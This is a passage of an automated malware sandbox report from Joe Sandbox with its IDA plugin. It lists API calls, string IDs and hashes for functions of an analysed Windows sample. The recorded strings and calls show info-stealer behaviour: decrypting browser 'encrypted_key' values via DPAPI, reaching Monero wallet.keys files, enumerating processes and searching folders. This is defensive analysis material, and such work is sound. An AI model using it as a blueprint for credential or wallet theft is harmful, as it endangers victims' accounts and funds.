                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: b7ea36b3afa64c1f9b78a656ea740d0473c1e5cb0bd464b17547217ec03e7d1c
                              • Instruction ID: bdd15c08bb8d4bb7f4dbace38b04daa7593301c23be48c043800ccc8a29a120d
                              • Opcode Fuzzy Hash: b7ea36b3afa64c1f9b78a656ea740d0473c1e5cb0bd464b17547217ec03e7d1c
                              • Instruction Fuzzy Hash: 1A3133B5D011099BCF08DBD8DD85AEFB7B9FF58304F444518E901E7241E7359A84CBA2
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008305BF), ref: 0082885A
                              • Process32First.KERNEL32(?,00000128), ref: 0082886E
                              • Process32Next.KERNEL32(?,00000128), ref: 00828883
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • CloseHandle.KERNEL32(?), ref: 008288F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 615b067b257d5ba0ff47379816094f1237b6ca585d81f96316e75a4c5c8702ea
                              • Instruction ID: 8dab2858842eea0de5af3f94843f19aedbf7b0c60e62a5038c249480b3208ec2
                              • Opcode Fuzzy Hash: 615b067b257d5ba0ff47379816094f1237b6ca585d81f96316e75a4c5c8702ea
                              • Instruction Fuzzy Hash: E6312C71901228ABCB28DB94ED51BEEB778FF44710F504599F50AE61A0DB306A84CFA2
                              APIs
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0088FE13
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0088FE2C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value___vcrt_
                              • String ID:
                              • API String ID: 1426506684-0
                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction ID: f3f4accc326bf3d9c76e4c805668395c621e5322b811e762f10a35caf7ad2b1b
                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction Fuzzy Hash: D3017C3220DB26AEFE3436785CC9A6A2694FB017B5B38433AF216C91F3EF524C419341
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830DE8,00000000,?), ref: 00827B40
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827B47
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00830DE8,00000000,?), ref: 00827B54
                              • wsprintfA.USER32 ref: 00827B83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 986f71541ceaa119d52221429355531e018e9f1c71f27265dac068411d63887d
                              • Instruction ID: a57de3016183ee87515a61c983ef519ca50a3cafbade8d74fe5b619528324332
                              • Opcode Fuzzy Hash: 986f71541ceaa119d52221429355531e018e9f1c71f27265dac068411d63887d
                              • Instruction Fuzzy Hash: 13112AB2908258ABCB14DBC9ED85BFEB7B8FB4CB11F10411AF605A6280E6395941C7B0
                              APIs
                              • CreateFileA.KERNEL32(00823D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00823D3E,?), ref: 0082948C
                              • GetFileSizeEx.KERNEL32(000000FF,00823D3E), ref: 008294A9
                              • CloseHandle.KERNEL32(000000FF), ref: 008294B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: a1fcc94da0e216dde6c8d7a15393a975b952fcc9eb3ef87ddfc775b7361bfe56
                              • Instruction ID: 320da986fb6c9c9e1e80b80f3ae9e583ff9142acd0bf8589239840c50656911e
                              • Opcode Fuzzy Hash: a1fcc94da0e216dde6c8d7a15393a975b952fcc9eb3ef87ddfc775b7361bfe56
                              • Instruction Fuzzy Hash: 84F03135E04208BBDB10DBF4EC89F5E77B9FB48714F108694FA51EB190D67096429B54
                              APIs
                              • __getptd.LIBCMT ref: 0082CA7E
                                • Part of subcall function 0082C2A0: __amsg_exit.LIBCMT ref: 0082C2B0
                              • __getptd.LIBCMT ref: 0082CA95
                              • __amsg_exit.LIBCMT ref: 0082CAA3
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0082CAC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 0d04895942f1ca1d26e7d683fb75ab7490540348370f5847687baa68ad24e51a
                              • Instruction ID: e54f6c6a6f0a40636c7567bf512fa5b8fb12758422c4cdcdf14848fc45ef71f0
                              • Opcode Fuzzy Hash: 0d04895942f1ca1d26e7d683fb75ab7490540348370f5847687baa68ad24e51a
                              • Instruction Fuzzy Hash: 81F067B2945738DBD620FBACB802B6E37A0FF40720F10014AE406E62D2CB2459C08BD7
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch
                              • String ID: MOC$RCC
                              • API String ID: 78271584-2084237596
                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction ID: 307176bf32f96a7e6d971cd36ab9c66c72981da53c82b21267cdb1fb344f7e48
                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction Fuzzy Hash: 82414871900209EFDF16EF98DC81AAEBBB5FF48304F198199FA04B6251D3359A50DF51
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 008251CA
                              • lstrcat.KERNEL32(?,00831058), ref: 008251E7
                              • lstrcat.KERNEL32(?,015F8960), ref: 008251FB
                              • lstrcat.KERNEL32(?,0083105C), ref: 0082520D
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824B7C
                                • Part of subcall function 00824B60: FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                                • Part of subcall function 00824B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                                • Part of subcall function 00824B60: FindClose.KERNEL32(000000FF), ref: 00824DE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 876d7195390d8a15be460ac6be0e6cfcaa76960ee7f1bedb17f7d9d4dec3f242
                              • Instruction ID: 161844926ba5c09a103d9dd8da00ec877a29f71a85419a7e9801381bbb145b8e
                              • Opcode Fuzzy Hash: 876d7195390d8a15be460ac6be0e6cfcaa76960ee7f1bedb17f7d9d4dec3f242
                              • Instruction Fuzzy Hash: 7721F8B6900218ABCB14EBF4FC96EED333CFB98300F404558B655D6191EE749AC98B92